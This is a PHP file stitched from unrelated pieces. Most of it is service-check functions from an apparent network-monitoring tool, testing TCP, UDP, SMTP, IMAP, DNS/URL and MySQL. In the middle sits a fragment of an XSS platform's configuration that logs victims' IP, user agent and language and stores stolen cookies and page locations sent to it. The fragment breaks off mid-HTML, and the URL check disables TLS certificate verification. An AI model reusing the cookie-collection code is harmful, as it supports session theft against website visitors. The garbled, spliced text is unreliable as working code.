function DoTest($testname, $param, $hostname, $timeout, $params)
{
global $NATS;
$timer = new TFNTimer();
if ($timeout <= 0) {
$timeout = $NATS->Cfg->Get("test.tcp.timeout", 0);
}
// if no test-specific param use sys default
if ($timeout <= 0) {
$timeout = 60;
}
// if sys default is <=0 then default to 60 seconds
$ip = ip_lookup($hostname);
if ($ip == "0") {
return -2;
}
// lookup failed
$errno = 0;
$errstr = "";
$timer->Start();
$fp = @fsockopen($ip, $param, $errno, $errstr, $timeout);
$elapsed = $timer->Stop();
if ($fp === false) {
return -1;
}
// open failed
@fclose($fp);
return $elapsed;
}
function DoTest($testname, $param, $hostname, $timeout, $params)
{
echo "Called for " . $hostname . " port " . $param . " timeout " . $timeout . "\n";
$timer = new TFNTimer();
$ip = ip_lookup($hostname);
echo $hostname . " => " . $ip . "\n";
if ($ip == "0") {
return -2;
}
// lookup failed
echo "Lookup Successful\n";
$errno = 0;
$errstr = "";
$timer->Start();
echo "Doing fsockopen()\n";
$fp = @fsockopen($ip, $param, $errno, $errstr, $timeout);
$elapsed = $timer->Stop();
echo "FP is : ";
echo $fp;
echo "\n";
if ($fp === false) {
return -1;
}
// open failed
echo "Closing\n";
@fclose($fp);
return $elapsed;
}
function DoTest($testname,$param,$hostname,$timeout,$params)
{
// Pre-resolve DNS
$ip=ip_lookup($params[0]);
if ($ip=="0") return -1;
// Do the test
return smtp_test_time($ip,$params[1],$timeout);
}
function DoTest($testname,$param,$hostname,$timeout,$params)
{ // 0: host, 1: user, 2: pass, 3: protocol, 4: port, 5: ssl (1/0)
if ($params[5]==1) $ssl=true;
else $ssl=false;
$ip=ip_lookup($params[0]);
if ($ip=="0") return -1;
return imap_test_time($ip,$params[1],$params[2],$timeout,$params[3],$params[4],$ssl);
}
function DoTest($testname, $param, $hostname, $timeout, $params)
{
$timer = new TFNTimer();
// First initialise DNS query object
$dnsserver = $params[1];
if ($dnsserver == "") {
return -3;
}
$dnsserver = ip_lookup($dnsserver);
$url = $param;
$dns_delay = $params[2];
if ($dns_delay == 0 || !is_numeric($dns_delay)) {
$dns_delay = 0;
}
// default no extra delay
if ($timeout <= 0) {
$timeout = 60;
}
$udp = true;
// initial setting
$port = 53;
$dns_query = new DNSQuery($dnsserver, $port, $timeout, $udp, false);
// run with debug off
$type = "A";
$matches = "";
$out = preg_match("@^(?:http[s]*://)?([^/|\\?|:]+)@i", $url, $matches);
$hostname = $matches[1];
// strip out hostname for FQDN lookup
$host_no_dots = str_replace(".", "", $hostname);
if (is_numeric($host_no_dots)) {
$is_ip_address = true;
} else {
$is_ip_address = false;
}
$timer->Start();
if (!$is_ip_address) {
$answer = $dns_query->Query($hostname, $type);
//echo "DNS";
if ($answer === false || $dns_query->error) {
$udp = false;
// switch to TCP
$dns_query->udp = $udp;
// wait!
while ($timer->Stop() < $dns_delay) {
usleep(100);
}
$answer = $dns_query->Query($hostname, $type);
//echo "DNS2";
}
if ($answer->count <= 0) {
return -1;
}
// no records returned
if ($answer === false) {
return -1;
}
// object is false
if ($dns_query->error) {
return -1;
}
// DNS object error
$dns_time_taken = $timer->Stop();
// if we get this far the DNS has worked
$ip_address = url_lookup($url);
// pre-cache DNS
} else {
$dns_time_taken = 0;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_MAXREDIRS, 32);
if ($timeout > 0) {
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
}
if ($timeout > 0) {
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
}
// restart timer
$timer->Start();
if (!($output = curl_exec($ch))) {
$ctr = -1;
// failed
} else {
$ctr = round(curl_getinfo($ch, CURLINFO_SIZE_DOWNLOAD) / 1024, 2);
}
$fetch_time_taken = $timer->Stop();
curl_close($ch);
if ($ctr <= 0) {
return -2;
}
// URL request failed
return $dns_time_taken + $fetch_time_taken;
// return elapsed time taken
}
function url_lookup($url)
{
// Sod regular expressions here as we'd have to do it twice or with cleverness I lack
// Is it a URL?
$colon = strpos($url, ":");
if ($colon != 0) {
$out = preg_match("@^(?:http[s]*://)?([^/|\\?|:]+)@i", $url, $matches);
$hostname = $matches[1];
} else {
$hostname = $url;
}
// try direct
return ip_lookup($hostname);
}
/***是否启用数据库***/
$use_db = true;
/***数据库选项***/
$MYSQL_HOST = 'localhost';
$MYSQL_PORT = '3306';
$MYSQL_USER = '******';
$MYSQL_PASS = '******';
$MYSQL_DBNM = 'xss';
/***使用文件存储模式下,creds和payloads路径,建议使用md5哈希后的复杂目录***/
$store_path = "./e160e60f7414a7bba0b46565c1ce0646/";
/***Cookie生成规则***/
#$token = md5(md5(md5(base64_encode(date("Y-m-d").$_SERVER['REMOTE_ADDR'].$username.$password))));
$token = md5(md5(md5(base64_encode($username . $password))));
/***全局参数***/
$ip = base64_encode($_SERVER['REMOTE_ADDR']);
$area = base64_encode(ip_lookup());
$time = date('Y-m-d H:i:s');
$user_lang = base64_encode($_SERVER['HTTP_ACCEPT_LANGUAGE']);
$user_agent = base64_encode($_SERVER['HTTP_USER_AGENT']);
/***当收到数据时触发XSS函数***/
if ($_REQUEST["cookie"] or $_REQUEST["location"]) {
$cookie = base64_encode($_REQUEST['cookie']);
$referer = base64_encode($_REQUEST['location']);
xss();
}
$common_head = <<<EOF
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8"/>
<meta http-equiv="Cache-Control" content="max-age=0" forua="true"/>
function DoTest($testname, $param, $hostname, $timeout, $params)
{
global $NATS;
if ($timeout <= 0) {
$timeout = $NATS->Cfg->Get("test.udp.timeout", 0);
}
// if no test-specific param use sys default
if ($timeout <= 0) {
$timeout = 20;
}
// if sys default is <=0 then default to 60 seconds
if ($params[1] != "") {
$package = $params[1];
} else {
$package = "";
}
if ($params[2] == 1) {
$reqresponse = true;
} else {
$reqresponse = false;
}
$timer = new TFNTimer();
$ip = ip_lookup($hostname);
if ($ip == "0") {
return -2;
}
// lookup failed
$connstr = "udp://" . $ip;
$errno = 0;
$errstr = "";
$timer->Start();
$fp = @fsockopen($connstr, $param, $errno, $errstr, $timeout);
if ($fp === false) {
return -1;
}
// open failed
stream_set_timeout($fp, $timeout);
$write = fwrite($fp, $package);
// send some data
if (!$write) {
return -3;
}
// failed to send data
$read = fgets($fp);
@fclose($fp);
$elapsed = $timer->Stop();
if (!$read) {
if ($reqresponse) {
return -4;
} else {
if (round($elapsed, 0) < $timeout) {
return -5;
// looks like a hard reject e.g. ICMP port unreachable
}
}
}
if ($elapsed == 0) {
$elapsed = "0.001";
}
return $elapsed;
}
function DoTest($testname, $param, $hostname, $timeout, $params)
{
// 0: host, 1: user, 2: pass, 3: database, 4: query
if ($testname == "mysql") {
$ip = ip_lookup($param);
if ($ip == "0") {
return -1;
}
// cache only as 127.0.0.1 is not the same connection as localhost for MySQL auth!
return mysql_test_time($param, $params[1], $params[2], $params[3], $timeout, $params[4]);
} else {
if ($testname == "mysqlrows") {
$ip = ip_lookup($param);
if ($ip == "0") {
return -1;
}
// cache only - see above
return mysql_test_rows($param, $params[1], $params[2], $params[3], $timeout, $params[4]);
} else {
if ($testname == "mysqldata") {
$ip = ip_lookup($param);
if ($ip == "0") {
return -1;
}
return mysql_test_data($param, $params[1], $params[2], $params[3], $timeout, $params[4], $params[5]);
} else {
return -1;
}
}
}
}
